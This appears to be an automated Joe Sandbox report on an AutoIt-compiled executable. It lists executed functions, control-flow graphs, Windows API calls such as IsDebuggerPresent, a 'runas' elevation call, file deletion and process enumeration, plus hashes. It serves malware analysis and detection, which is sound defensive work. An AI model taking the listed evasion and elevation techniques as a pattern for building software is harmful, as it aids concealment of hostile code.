e2dee4 __fread_nolock 98616->98628 98617 e71a7d 98667 e3e6e8 207 API calls 98619->98667 98623 e4014b 8 API calls 98621->98623 98621->98628 98622->98617 98668 e93fe1 81 API calls __wsopen_s 98622->98668 98624 e2dddb 98623->98624 98624->98619 98626 e2de16 98624->98626 98625 e4017b 8 API calls 98625->98628 98627 e30340 207 API calls 98626->98627 98629 e2de29 98627->98629 98628->98622 98628->98625 98629->98617 98629->98628 98630 e71aa5 98629->98630 98631 e2de77 98629->98631 98633 e2d526 98629->98633 98670 e93fe1 81 API calls __wsopen_s 98630->98670 98631->98612 98631->98633 98634 e4014b 8 API calls 98633->98634 98635 e2d589 98634->98635 98651 e2c32d 98635->98651 98638 e4014b 8 API calls 98642 e2d66e ISource 98638->98642 98640 e2b4c8 8 API calls 98640->98642 98642->98640 98643 e71f79 98642->98643 98644 e71f94 98642->98644 98646 e2bed9 8 API calls 98642->98646 98647 e2c3ab 8 API calls 98642->98647 98648 e2d911 ISource 98642->98648 98671 e856ae 8 API calls ISource 98643->98671 98646->98642 98647->98642 98649 e2d9ac ISource 98648->98649 98658 e2c3ab 98648->98658 98650 e2d9c3 98649->98650 98666 e3e30a 8 API calls ISource 98649->98666 98654 e2c33d 98651->98654 98652 e2c345 98652->98638 98653 e4014b 8 API calls 98653->98654 98654->98652 98654->98653 98655 e2bf73 8 API calls 98654->98655 98656 e2c32d 8 API calls 98654->98656 98657 e2bed9 8 API calls 98654->98657 98655->98654 98656->98654 98657->98654 98659 e2c3b9 98658->98659 98665 e2c3e1 ISource 98658->98665 98660 e2c3c7 98659->98660 98661 e2c3ab 8 API calls 98659->98661 98662 e2c3cd 98660->98662 98663 e2c3ab 8 API calls 98660->98663 98661->98660 98662->98665 98672 e2c7e0 8 API calls ISource 98662->98672 98663->98662 98665->98649 98666->98649 98667->98622 98668->98617 98669->98617 98670->98617 98671->98644 98672->98665 99233 e3235c 99234 e32365 __fread_nolock 99233->99234 99235 e28ec0 52 API calls 99234->99235 99236 e774e3 99234->99236 99239 e323b6 99234->99239 99240 e4014b 8 API calls 99234->99240 99243 e31ff7 __fread_nolock 99234->99243 99244 e4017b 8 API calls 99234->99244 99235->99234 99245 e813c8 8 API calls __fread_nolock 99236->99245 99238 e774ef 99242 e2bed9 8 API calls 99238->99242 99238->99243 99241 e27d74 8 API calls 99239->99241 99240->99234 99241->99243 99242->99243 99244->99234 99245->99238

                                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                                    Function 00E25FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 224 e25fc8-e26037 call e2bf73 GetVersionExW call e28577 229 e6507d-e65090 224->229 230 e2603d 224->230 232 e65091-e65095 229->232 231 e2603f-e26041 230->231 233 e26047-e260a6 call e2adf4 call e255dc 231->233 234 e650bc 231->234 235 e65097 232->235 236 e65098-e650a4 232->236 249 e65224-e6522b 233->249 250 e260ac-e260ae 233->250 239 e650c3-e650cf 234->239 235->236 236->232 238 e650a6-e650a8 236->238 238->231 241 e650ae-e650b5 238->241 243 e2611c-e26136 GetCurrentProcess IsWow64Process 239->243 241->229 242 e650b7 241->242 242->234 245 e26195-e2619b 243->245 246 e26138 243->246 248 e2613e-e2614a 245->248 246->248 251 e26150-e2615f LoadLibraryA 248->251 252 e65269-e6526d GetSystemInfo 248->252 255 e6522d 249->255 256 e6524b-e6524e 249->256 253 e65125-e65138 250->253 254 e260b4-e260b7 250->254 259 e26161-e2616f GetProcAddress 251->259 260 e2619d-e261a7 GetSystemInfo 251->260 261 e65161-e65163 253->261 262 e6513a-e65143 253->262 254->243 263 e260b9-e260f5 254->263 264 e65233 255->264 257 e65250-e6525f 256->257 258 e65239-e65241 256->258 257->264 265 e65261-e65267 257->265 258->256 259->260 266 e26171-e26175 GetNativeSystemInfo 259->266 267 e26177-e26179 260->267 271 e65165-e6517a 261->271 272 e65198-e6519b 261->272 268 e65145-e6514b 262->268 269 e65150-e6515c 262->269 263->243 270 e260f7-e260fa 263->270 264->258 265->258 266->267 277 e26182-e26194 267->277 278 e2617b-e2617c FreeLibrary 267->278 268->243 269->243 279 e650d4-e650e4 270->279 280 e26100-e2610a 270->280 273 e65187-e65193 271->273 274 e6517c-e65182 271->274 275 e651d6-e651d9 272->275 276 e6519d-e651b8 272->276 273->243 274->243 275->243 285 e651df-e65206 275->285 281 e651c5-e651d1 276->281 282 e651ba-e651c0 276->282 278->277 283 e650e6-e650f2 279->283 284 e650f7-e65101 279->284 280->239 286 e26110-e26116 280->286 281->243 282->243 283->243 287 e65114-e65120 284->287 288 e65103-e6510f 284->288 289 e65213-e6521f 285->289 290 e65208-e6520e 285->290 286->243 287->243 288->243 289->243 290->243
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00E25FF7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00EBDC2C,00000000,?,?), ref: 00E26123
                                                                                                                                                                                                                                                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00E2612A
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00E26155
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E26167
                                                                                                                                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00E26175
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 00E2617C
                                                                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 00E261A1
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                                                    • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4e28b761130e29a5c2c233e3f73a02506e6d45ba64f31fb91990e679782629c6
                                                                                                                                                                                                                                                                                                    • Instruction ID: e9dd87bae5611a2a656f6a7bbfacaaa09ae241560786d1675b2ef6797e4f22d2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e28b761130e29a5c2c233e3f73a02506e6d45ba64f31fb91990e679782629c6
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CA1D4B294B2D6CFC711CB6A7C411F53FA46BA6344F0869ADD284B3222D32D494CCB31
                                                                                                                                                                                                                                                                                                    Function 00E2338B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00E23368,?), ref: 00E233BB
                                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00E23368,?), ref: 00E233CE
                                                                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00EF2418,00EF2400,?,?,?,?,?,?,00E23368,?), ref: 00E2343A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E23462,00EF2418,?,?,?,?,?,?,?,00E23368,?), ref: 00E242A0
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001,00EF2418,?,?,?,?,?,?,?,00E23368,?), ref: 00E234BB
                                                                                                                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00E63CB0
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00EF2418,?,?,?,?,?,?,?,00E23368,?), ref: 00E63CF1
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EE31F4,00EF2418,?,?,?,?,?,?,?,00E23368), ref: 00E63D7A
                                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00E63D81
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E234D3: GetSysColorBrush.USER32(0000000F), ref: 00E234DE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E234D3: LoadCursorW.USER32(00000000,00007F00), ref: 00E234ED
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E234D3: LoadIconW.USER32(00000063), ref: 00E23503
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E234D3: LoadIconW.USER32(000000A4), ref: 00E23515
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E234D3: LoadIconW.USER32(000000A2), ref: 00E23527
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E234D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E2353F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E234D3: RegisterClassExW.USER32(?), ref: 00E23590
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E235B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E235E1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E235B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E23602
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E235B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00E23368,?), ref: 00E23616
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E235B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00E23368,?), ref: 00E2361F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E23A3C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • AutoIt, xrefs: 00E63CA5
                                                                                                                                                                                                                                                                                                    • runas, xrefs: 00E63D75
                                                                                                                                                                                                                                                                                                    • 0$, xrefs: 00E23495
                                                                                                                                                                                                                                                                                                    • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00E63CAA
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                                    • String ID: 0$$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                                                    • API String ID: 683915450-3328958999
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9122f370577803baabdf0bc40a6bd7dd62422c9a7618d8b6f6fdb93be2470384
                                                                                                                                                                                                                                                                                                    • Instruction ID: f2e213b9317ae81a7156bfe6bccf8155d3bbf13cac461b66fd9e4ead2bb6bb79
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9122f370577803baabdf0bc40a6bd7dd62422c9a7618d8b6f6fdb93be2470384
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3651E371248355AED701FF71BC019BA7BE8ABD4744F00252CF6A2761A2DB648A4DDB22
                                                                                                                                                                                                                                                                                                    Function 00E8DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 1741 e8dc54-e8dc9b call e2bf73 * 3 call e25851 call e8eab0 1752 e8dcab-e8dcdc call e2568e FindFirstFileW 1741->1752 1753 e8dc9d-e8dca6 call e26b7c 1741->1753 1757 e8dd4b-e8dd52 FindClose 1752->1757 1758 e8dcde-e8dce0 1752->1758 1753->1752 1760 e8dd56-e8dd78 call e2bd98 * 3 1757->1760 1758->1757 1759 e8dce2-e8dce7 1758->1759 1761 e8dce9-e8dd24 call e2bed9 call e27bb5 call e26b7c DeleteFileW 1759->1761 1762 e8dd26-e8dd38 FindNextFileW 1759->1762 1761->1762 1776 e8dd42-e8dd49 FindClose 1761->1776 1762->1758 1765 e8dd3a-e8dd40 1762->1765 1765->1758 1776->1760
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E25851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E255D1,?,?,00E64B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E25871
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8EAB0: GetFileAttributesW.KERNEL32(?,00E8D840), ref: 00E8EAB1
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00E8DCCB
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E8DD1B
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E8DD2C
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E8DD43
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E8DD4C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                                                    • Opcode ID: cc26b1964e9b4179529749da2d905517bad07380131069874b36e4a53cd7e157
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7000900b0a9eac8cfabc7cd16ad15b565dde7b282ede7701e802e818b548e899
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc26b1964e9b4179529749da2d905517bad07380131069874b36e4a53cd7e157
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA31393104C395AFC205FB60DD859AFB7E8AE95304F406A5DF4D9A21A1EB21DA09CB62
                                                                                                                                                                                                                                                                                                    Function 00E8DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00E8DDAC
                                                                                                                                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00E8DDBA
                                                                                                                                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00E8DDDA
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E8DE87
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 901df911ef48bce18c5ab5f50bc81c88d88f9f7f0d26326f7d670708e9bdbe7d
                                                                                                                                                                                                                                                                                                    • Instruction ID: e6cc33c17dc516ee714636258408aec3822f1b3d05edb927cad0327529f837ea
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 901df911ef48bce18c5ab5f50bc81c88d88f9f7f0d26326f7d670708e9bdbe7d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD31A2711083019FD300EF54DC85AAFBBE8AF99354F04192DF589A71A1EB71A949CB92
                                                                                                                                                                                                                                                                                                    Function 00E3AC3E Relevance: 33.9, APIs: 1, Strings: 18, Instructions: 671COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 0 e3ac3e-e3b063 call e28ec0 call e3bc58 call e2e6a0 7 e78584-e78591 0->7 8 e3b069-e3b073 0->8 11 e78596-e785a5 7->11 12 e78593 7->12 9 e3b079-e3b07e 8->9 10 e7896b-e78979 8->10 13 e785b2-e785b4 9->13 14 e3b084-e3b090 call e3b5b6 9->14 17 e7897e 10->17 18 e7897b 10->18 15 e785a7 11->15 16 e785aa 11->16 12->11 21 e785bd 13->21 14->21 25 e3b096-e3b0a3 call e2c98d 14->25 15->16 16->13 20 e78985-e7898e 17->20 18->17 22 e78993 20->22 23 e78990 20->23 26 e785c7 21->26 27 e7899c-e789eb call e2e6a0 call e3bbbe * 2 22->27 23->22 33 e3b0ab-e3b0b4 25->33 31 e785cf-e785d2 26->31 64 e3b1e0-e3b1f5 27->64 65 e789f1-e78a03 call e3b5b6 27->65 34 e3b158-e3b16f 31->34 35 e785d8-e78600 call e44cd3 call e27ad5 31->35 37 e3b0b8-e3b0d6 call e44d98 33->37 40 e78954-e78957 34->40 41 e3b175 34->41 76 e78602-e78606 35->76 77 e7862d-e78651 call e27b1a call e2bd98 35->77 56 e3b0e5 37->56 57 e3b0d8-e3b0e1 37->57 45 e78a41-e78a79 call e2e6a0 call e3bbbe 40->45 46 e7895d-e78960 40->46 47 e788ff-e78920 call e2e6a0 41->47 48 e3b17b-e3b17e 41->48 45->64 106 e78a7f-e78a91 call e3b5b6 45->106 46->27 53 e78962-e78965 46->53 47->64 69 e78926-e78938 call e3b5b6 47->69 54 e3b184-e3b187 48->54 55 e78729-e78743 call e3bbbe 48->55 53->10 53->64 66 e786ca-e786e0 call e26c03 54->66 67 e3b18d-e3b190 54->67 85 e7888f-e788b5 call e2e6a0 55->85 86 e78749-e7874c 55->86 56->26 60 e3b0eb-e3b0fc 56->60 57->37 68 e3b0e3 57->68 60->10 70 e3b102-e3b11c 60->70 71 e3b1fb-e3b20b call e2e6a0 64->71 72 e78ac9-e78acf 64->72 97 e78a05-e78a0d 65->97 98 e78a2f-e78a3c call e2c98d 65->98 66->64 95 e786e6-e786fc call e3b5b6 66->95 79 e78656-e78659 67->79 80 e3b196-e3b1b8 call e2e6a0 67->80 68->60 117 e78945 69->117 118 e7893a-e78943 call e2c98d 69->118 70->31 82 e3b122-e3b154 call e3bbbe call e2e6a0 70->82 72->33 88 e78ad5 72->88 76->77 90 e78608-e7862b call e2ad40 76->90 77->79 79->10 83 e7865f-e78674 call e26c03 79->83 80->64 114 e3b1ba-e3b1cc call e3b5b6 80->114 82->34 83->64 137 e7867a-e78690 call e3b5b6 83->137 85->64 124 e788bb-e788cd call e3b5b6 85->124 104 e787bf-e787de call e2e6a0 86->104 105 e7874e-e78751 86->105 88->10 90->76 90->77 143 e786fe-e7870b call e28ec0 95->143 144 e7870d-e78716 call e28ec0 95->144 112 e78a0f-e78a13 97->112 113 e78a1e-e78a29 call e2b4b1 97->113 150 e78ac2-e78ac4 98->150 104->64 142 e787e4-e787f6 call e3b5b6 104->142 120 e78757-e78774 call e2e6a0 105->120 121 e78ada-e78ae8 105->121 154 e78ab5-e78abe call e2c98d 106->154 155 e78a93-e78a9b 106->155 112->113 130 e78a15-e78a19 112->130 113->98 161 e78b0b-e78b19 113->161 162 e3b1d2-e3b1de 114->162 163 e786ba-e786c3 call e2c98d 114->163 136 e78949-e7894f 117->136 118->136 120->64 165 e7877a-e7878c call e3b5b6 120->165 128 e78aed-e78afd 121->128 129 e78aea 121->129 169 e788cf-e788dc call e2c98d 124->169 170 e788de 124->170 145 e78b02-e78b06 128->145 146 e78aff 128->146 129->128 147 e78aa1-e78aa3 130->147 136->64 178 e78692-e7869b call e2c98d 137->178 179 e7869d-e786ab call e28ec0 137->179 142->64 185 e787fc-e78805 call e3b5b6 142->185 186 e78719-e78724 call e28577 143->186 144->186 145->71 146->145 147->64 150->64 154->150 166 e78a9d 155->166 167 e78aa8-e78ab3 call e2b4b1 155->167 175 e78b1e-e78b21 161->175 176 e78b1b 161->176 162->64 163->66 191 e7879f 165->191 192 e7878e-e7879d call e2c98d 165->192 166->147 167->154 167->161 184 e788e2-e788e9 169->184 170->184 175->20 176->175 199 e786ae-e786b5 178->199 179->199 194 e788f5 call e23907 184->194 195 e788eb-e788f0 call e2396b 184->195 210 e78807-e78816 call e2c98d 185->210 211 e78818 185->211 186->64 201 e787a3-e787ae call e49334 191->201 192->201 209 e788fa 194->209 195->64 199->64 201->10 215 e787b4-e787ba 201->215 209->64 214 e7881c-e7883f 210->214 211->214 217 e78841-e78848 214->217 218 e7884d-e78850 214->218 215->64 217->218 219 e78852-e7885b 218->219 220 e78860-e78863 218->220 219->220 221 e78865-e7886e 220->221 222 e78873-e78876 220->222 221->222 222->64 223 e7887c-e7888a 222->223 223->64
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID: 4$@$P$`*$`$d0b$d10m0$d1b$d1r0,2$d5m0$e#$i$t$t$($($($(
                                                                                                                                                                                                                                                                                                    • API String ID: 0-2951036942
                                                                                                                                                                                                                                                                                                    • Opcode ID: e8909c334c86c75ca39df752ace8dc041ba07f55e69f26fa80714e694b8b588d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 29475239520bfc9de17696263761ee9feb4715b232e1d66154acfbbb66ce3ba8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8909c334c86c75ca39df752ace8dc041ba07f55e69f26fa80714e694b8b588d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B6258705093419FC728DF14C589AAABBE1FFD8308F10996EE58AAB351DB70D945CF82
                                                                                                                                                                                                                                                                                                    Function 00E23624 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53windowregistryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00E23657
                                                                                                                                                                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00E23681
                                                                                                                                                                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E23692
                                                                                                                                                                                                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00E236AF
                                                                                                                                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E236BF
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(000000A9), ref: 00E236D5
                                                                                                                                                                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E236E4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
